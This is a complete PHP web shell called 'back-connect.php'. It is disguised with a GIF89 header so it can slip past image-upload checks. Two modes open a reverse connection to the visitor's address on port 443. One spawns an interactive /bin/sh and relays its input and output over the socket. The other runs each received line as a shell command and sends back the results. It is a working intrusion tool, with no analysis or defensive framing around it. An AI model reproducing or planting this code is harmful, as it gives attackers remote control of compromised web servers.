back-connect.php

1. GIF89;a
2. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
3. <HTML>
4. <HEAD>
5. <META http-equiv=Content-Type content="text/html; charset=windows-1254">
6. </HEAD>
7. <BODY>
8. <CENTER>
9. <?php
10. $uname = php_uname();
11. echo "Uname -a :$uname";
12. ?>
13. <br><br>
14. <a href="?BackConnect=PHP_1">PHP BackConnect 1</a>
15. &nbsp;&nbsp; <a href="?BackConnect=PHP_2">PHP BackConnect 2</a>
16. <?php
17. function printit ($string) {
18.    if (!$daemon) {
19.       print "$string\n";
20.    }
21. }
22. $bc = $_GET["BackConnect"];
23. switch($bc){
24. case "PHP_1":
25.  
26. set_time_limit (0);
27. $VERSION = "1.0";
28. $ip = $_SERVER["REMOTE_ADDR"];
29. $port = 443;    
30. $chunk_size = 1400;
31. $write_a = null;
32. $error_a = null;
33. $shell = 'uname -a; w; id; /bin/sh -i';
34. $daemon = 0;
35. $debug = 0;
36. if (function_exists('pcntl_fork')) {
37.    
38.    $pid = pcntl_fork();
39.    
40.    if ($pid == -1) {
41.       printit("ERROR: Can't fork");
42.       exit(1);
43.    }
44.    
45.    if ($pid) {
46.       exit(0);  // Parent exits
47.    }
48.    if (posix_setsid() == -1) {
49.       printit("Error: Can't setsid()");
50.       exit(1);
51.    }
52.  
53.    $daemon = 1;
54. } else {
55.    print("WARNING: Failed to daemonise.  This is quite common and not fatal.");
56. }
57.  
58. // Change to a safe directory
59. chdir("/");
60.  
61. // Remove any umask we inherited
62. umask(0);
63.  
64. //
65. // Do the reverse shell...
66. //
67.  
68. // Open reverse connection
69. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
70. if (!$sock) {
71.    printit("$errstr ($errno)");
72.    exit(1);
73. }
74.  
75. // Spawn shell process
76. $descriptorspec = array(
77.    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
78.    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
79.    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
80. );
81.  
82. $process = proc_open($shell, $descriptorspec, $pipes);
83.  
84. if (!is_resource($process)) {
85.    printit("ERROR: Can't spawn shell");
86.    exit(1);
87. }
88.  
89. // Set everything to non-blocking
90. // Reason: Occsionally reads will block, even though stream_select tells us they won't
91. stream_set_blocking($pipes[0], 0);
92. stream_set_blocking($pipes[1], 0);
93. stream_set_blocking($pipes[2], 0);
94. stream_set_blocking($sock, 0);
95.  
96. printit("Successfully opened reverse shell to $ip:$port");
97.  
98. while (1) {
99.    // Check for end of TCP connection
100.    if (feof($sock)) {
101.       printit("ERROR: Shell connection terminated");
102.       break;
103.    }
104.  
105.    // Check for end of STDOUT
106.    if (feof($pipes[1])) {
107.       printit("ERROR: Shell process terminated");
108.       break;
109.    }
110.  
111.    // Wait until a command is end down $sock, or some
112.    // command output is available on STDOUT or STDERR
113.    $read_a = array($sock, $pipes[1], $pipes[2]);
114.    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
115.  
116.    // If we can read from the TCP socket, send
117.    // data to process's STDIN
118.    if (in_array($sock, $read_a)) {
119.       if ($debug) printit("SOCK READ");
120.       $input = fread($sock, $chunk_size);
121.       if ($debug) printit("SOCK: $input");
122.       fwrite($pipes[0], $input);
123.    }
124.  
125.    // If we can read from the process's STDOUT
126.    // send data down tcp connection
127.    if (in_array($pipes[1], $read_a)) {
128.       if ($debug) printit("STDOUT READ");
129.       $input = fread($pipes[1], $chunk_size);
130.       if ($debug) printit("STDOUT: $input");
131.       fwrite($sock, $input);
132.    }
133.  
134.    // If we can read from the process's STDERR
135.    // send data down tcp connection
136.    if (in_array($pipes[2], $read_a)) {
137.       if ($debug) printit("STDERR READ");
138.       $input = fread($pipes[2], $chunk_size);
139.       if ($debug) printit("STDERR: $input");
140.       fwrite($sock, $input);
141.    }
142. }
143.  
144. fclose($sock);
145. fclose($pipes[0]);
146. fclose($pipes[1]);
147. fclose($pipes[2]);
148. proc_close($process);
149.  
150. // Like print, but does nothing if we've daemonised ourself
151. // (I can't figure out how to redirect STDOUT like a proper daemon)
152. break;
153. case "PHP_2":
154.           $ipim=$_SERVER["REMOTE_ADDR"];
155.          $portum="443";
156.          if ($ipim <> "")
157.          {
158.          $mucx=fsockopen($ipim , $portum , $errno, $errstr );
159.          if (!$mucx){
160.                $result = "Error: didnt connect !!!";
161.          }
162.          else {
163.          
164.          $zamazing0="\n";
165.          fputs ($mucx ,"\nwelcome ZoRBaCK\n\n");
166.          fputs($mucx , system("uname -a") .$zamazing0 );
167.          fputs($mucx , system("pwd") .$zamazing0 );
168.          fputs($mucx , system("id") .$zamazing0.$zamazing0 );
169.          while(!feof($mucx)){  
170.          fputs ($mucx);
171.         $one="[$";
172.         $two="]";
173.         $result= fgets ($mucx, 8192);
174.         $message=`$result`;
175.        fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
176.       }
177.       fclose ($mucx);
178.          }
179.          }
180.  
181. break;
182.  
183. }
184. ?>
185. </CENTER>
186. </BODY>
187. </HTML>